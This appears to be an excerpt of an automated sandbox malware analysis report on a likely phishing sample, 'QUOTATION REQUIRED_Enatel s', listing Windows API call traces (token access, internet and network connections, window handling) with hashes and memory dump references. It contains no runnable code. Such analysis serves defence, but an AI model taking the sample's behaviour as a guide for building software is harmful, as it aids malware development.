• Opcode Fuzzy Hash: 15f98967df03a51305d91d880b10f9e5f0dedce26448059f81b39f6e857d7e65
• Instruction Fuzzy Hash: B4F03A76045258BADB125F94AC0DFCE3F59AF06310F448000FA11A50E2CBB95511EBE9
APIs
• GetSysColor.USER32(00000008), ref: 00F298CC
• SetTextColor.GDI32(?,?), ref: 00F298D6
• SetBkMode.GDI32(?,00000001), ref: 00F298E9
• GetStockObject.GDI32(00000005), ref: 00F298F1
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4037423528-0
                                                                                                                    • Opcode ID: 6c16219b8a4ee1b8254383ae528bdda508788c70e94f635608260d02592ef8e5
                                                                                                                    • Instruction ID: d4494bb5f9f90e8f0d67471d86bfcad8bfb2490d497f8809a7b80651a3a0387f
                                                                                                                    • Opcode Fuzzy Hash: 6c16219b8a4ee1b8254383ae528bdda508788c70e94f635608260d02592ef8e5
                                                                                                                    • Instruction Fuzzy Hash: 6CE06D71644288AEDB216B74BC09BE83F60EB13736F088219F6FA580E1C7724680AB10
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00F71634
                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F711D9), ref: 00F7163B
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F711D9), ref: 00F71648
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F711D9), ref: 00F7164F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: e4278f2f94680fbf701a073f8e9698c04f8170203ab649d23502518159a9e5e7
                                                                                                                    • Instruction ID: 5caadc0f98027b22dac22709af86485a52ec30aea1e58916edb6d9adcd838015
                                                                                                                    • Opcode Fuzzy Hash: e4278f2f94680fbf701a073f8e9698c04f8170203ab649d23502518159a9e5e7
                                                                                                                    • Instruction Fuzzy Hash: AEE086B1A01215DBD7201FA49D0DB473BBCBF467A1F14C809F245C9080D6344544E791
                                                                                                                    APIs
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F6D858
                                                                                                                    • GetDC.USER32(00000000), ref: 00F6D862
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6D882
                                                                                                                    • ReleaseDC.USER32(?), ref: 00F6D8A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: a38fb8ca51e75167f1ae84f1cd9d3622af0a10b78000eef3e029cc24e3899f15
                                                                                                                    • Instruction ID: de097d6f6a473eeb2f4ef351a53ad16ff9da480fb6dcf43b3cc8c5748a70ce3b
                                                                                                                    • Opcode Fuzzy Hash: a38fb8ca51e75167f1ae84f1cd9d3622af0a10b78000eef3e029cc24e3899f15
                                                                                                                    • Instruction Fuzzy Hash: 4BE09AB5940209DFCB41DFA0D90C66DBBB5FB09311F148459E84AE7350CB389941BF90
                                                                                                                    APIs
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F6D86C
                                                                                                                    • GetDC.USER32(00000000), ref: 00F6D876
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6D882
                                                                                                                    • ReleaseDC.USER32(?), ref: 00F6D8A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 94ffb31e5f21f7b09dc2ea295972a20b68590d7dee9d9cbf4cf14313b6c25e32
                                                                                                                    • Instruction ID: d2ccbaca1cf1d56ae8c0eddaf3b6aba213625b809ca9ba951a5bdeb6b6ab1e6c
                                                                                                                    • Opcode Fuzzy Hash: 94ffb31e5f21f7b09dc2ea295972a20b68590d7dee9d9cbf4cf14313b6c25e32
                                                                                                                    • Instruction Fuzzy Hash: A2E092B5800208EFCB51EFA0D80866EBBB5BB09311B148449E94AE7360CB389942BF90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F84ED4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection_wcslen
                                                                                                                    • String ID: *$LPT
                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                    • Opcode ID: 8dfeebc2741f5ee0c1b00bf9dde06d6d68817408a07342c77df8e6d570b3f915
                                                                                                                    • Instruction ID: f47f3a68d9d9d989052617d25fc56ecc0d6dcf3c39b4bf5a978353654de2c641
                                                                                                                    • Opcode Fuzzy Hash: 8dfeebc2741f5ee0c1b00bf9dde06d6d68817408a07342c77df8e6d570b3f915
                                                                                                                    • Instruction Fuzzy Hash: 48913C75A002059FCB14EF58C884EEABBF1AF44314F19809DE90A9F3A2D735ED85DB91
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00F3E30D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                    • Opcode ID: 30aad09ac9ec555d3b904b5bb49d5bf2579d60cfde808957fef80490eee62894
                                                                                                                    • Instruction ID: d204426f008871a343637c4f1cf81205bd5401bfd04b9d2d9cf75c30eb5e1faf
                                                                                                                    • Opcode Fuzzy Hash: 30aad09ac9ec555d3b904b5bb49d5bf2579d60cfde808957fef80490eee62894
                                                                                                                    • Instruction Fuzzy Hash: 33516B61E1C30696CB157724CD413BA3FA4EF40770F348E68E8D5823E9EB348C95BA86
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 0-1885708031
                                                                                                                    • Opcode ID: 29ab4170986eef7dc230b4d855552ef02adae3a631658b1ccca33df3441786ff
                                                                                                                    • Instruction ID: 0dddadd7a2dcfc6b4acc5074d3fb30c7a09783cf88203b707b243d474ae2aa19
                                                                                                                    • Opcode Fuzzy Hash: 29ab4170986eef7dc230b4d855552ef02adae3a631658b1ccca33df3441786ff
                                                                                                                    • Instruction Fuzzy Hash: 6F51367AD04256DFDF15DF28D4416FA7BA8EF55320F344055ECA29B2C0D6349D42EBA0
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00F2F2A2
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F2F2BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: 5bff894f9d9264a75b7a5797fd2bbb54449dc2f046434c77990bbd41b1c45e15
                                                                                                                    • Instruction ID: ea68aaff0db99a935bf3974eda544f1240d8066d19a5b7f901e44f4d86b321ac
                                                                                                                    • Opcode Fuzzy Hash: 5bff894f9d9264a75b7a5797fd2bbb54449dc2f046434c77990bbd41b1c45e15
                                                                                                                    • Instruction Fuzzy Hash: 825136714087489BD320AF10DC86BAFBBF8FF85300F81885DF1D9421A5EB749569DBA6
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00F957E0
                                                                                                                    • _wcslen.LIBCMT ref: 00F957EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                    • Opcode ID: 8ca00625ab12a784b2b104d4806dc4ddd9287c58281552d7fda9bccf4538bb13
                                                                                                                    • Instruction ID: d90f5c211101becc13aaaed3e03eb7eac513cd203642ff0f26c9e915d93d1214
                                                                                                                    • Opcode Fuzzy Hash: 8ca00625ab12a784b2b104d4806dc4ddd9287c58281552d7fda9bccf4538bb13
                                                                                                                    • Instruction Fuzzy Hash: E241BE71E002099FDF14EFA9C8859EEBBB5EF59720F108029E505A7252EB349D81EB90
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00F8D130
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F8D13A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                    • Opcode ID: 272aafe7dcd88f224397746fbd9dea9c059b53046331ddcad1d58af4b5225737
                                                                                                                    • Instruction ID: f22ad338668a4be6e47b5eb5ac532db52cb451f8835c22bb0da49d82d96289de
                                                                                                                    • Opcode Fuzzy Hash: 272aafe7dcd88f224397746fbd9dea9c059b53046331ddcad1d58af4b5225737
                                                                                                                    • Instruction Fuzzy Hash: 40317E71D00209ABDF11EFA5CC85EEEBFB9FF04310F000019F815A6162EB35AA46EB64
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00FA3621
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FA365C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: 06ea941c66746dd0ceff467c36898513c0e47c5fcfa98496b01d57c906c61772
                                                                                                                    • Instruction ID: df153e2bde81b209198f522c969d53ac2ebb6ab88e8b75bd09350e638251d86d
                                                                                                                    • Opcode Fuzzy Hash: 06ea941c66746dd0ceff467c36898513c0e47c5fcfa98496b01d57c906c61772
                                                                                                                    • Instruction Fuzzy Hash: 4D3190B1510204AEDB10DF68DC80EFB73A9FF89760F008619F8A5D7280DA35ED81E760
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FA461F
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA4634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 0983fdb7967083f95a51f34822a9ee118a85566ee831861dcea77658c5f9c5e9
                                                                                                                    • Instruction ID: b2b096533fdea223bae625790c98ad79232e3a8d7d78fdc1cd4b2bb3a12c52c8
                                                                                                                    • Opcode Fuzzy Hash: 0983fdb7967083f95a51f34822a9ee118a85566ee831861dcea77658c5f9c5e9
                                                                                                                    • Instruction Fuzzy Hash: FC3119B5E012099FDB14CF69C990BDABBB5FF8A310F14406AE905AB391D7B0A941DF90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FA327C
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FA3287
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: 58c366c2eed0ede17797aad954d806d15a502b76dcc77fddd6591e8ec87c8877
                                                                                                                    • Instruction ID: 0cc821732c9b568eacb099c817c537ade49bc9312f2241a71d9eb91187963068
                                                                                                                    • Opcode Fuzzy Hash: 58c366c2eed0ede17797aad954d806d15a502b76dcc77fddd6591e8ec87c8877
                                                                                                                    • Instruction Fuzzy Hash: D311B6B17002087FEF219E54DC81FBB379AEB563A4F104125F91897290D6719D51A7A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F1604C
                                                                                                                      • Part of subcall function 00F1600E: GetStockObject.GDI32(00000011), ref: 00F16060
                                                                                                                      • Part of subcall function 00F1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F1606A
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA377A
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00FA3794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: 63ea269c6c9ba3cae0011cca47d1018268a4832255a5ff59913456a8c74920ac
                                                                                                                    • Instruction ID: 602068964395133cc99019e27ef04f8c88b53952905b971907f8da78db813575
                                                                                                                    • Opcode Fuzzy Hash: 63ea269c6c9ba3cae0011cca47d1018268a4832255a5ff59913456a8c74920ac
                                                                                                                    • Instruction Fuzzy Hash: D91129B2610209AFDB00DFA8CC45EFA7BB8FB09354F004514F955E2250E775E951ABA0
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F8CD7D
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F8CDA6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: aebd8f46414c1061f6efba7602c175b2bcec1628cceff57983f305b662d17b68
                                                                                                                    • Instruction ID: 105612300cbf0ca2a0aae5619b7168edab3da0ac048be1963868f4a27234a02b
                                                                                                                    • Opcode Fuzzy Hash: aebd8f46414c1061f6efba7602c175b2bcec1628cceff57983f305b662d17b68
                                                                                                                    • Instruction Fuzzy Hash: EB11A3776056367AD7246B668C45FE7BEA9EB127B4F004226B52983180D6709841E7F0
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00FA34AB
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FA34BA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 2ce3126190d2573f042bb3b0a04a0706a4c8fb129e476eb893f04c6a6b1b9022
                                                                                                                    • Instruction ID: 52d891637dda853817384584829ddc2f05e6ebb1cafcad89b9c54cf3fb58fa8a
                                                                                                                    • Opcode Fuzzy Hash: 2ce3126190d2573f042bb3b0a04a0706a4c8fb129e476eb893f04c6a6b1b9022
                                                                                                                    • Instruction Fuzzy Hash: 2B118FB1900208AFEB118E64DC44AEB3B6AEB0A374F504324FD65971D4C775DD91BB90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00F76CB6
                                                                                                                    • _wcslen.LIBCMT ref: 00F76CC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
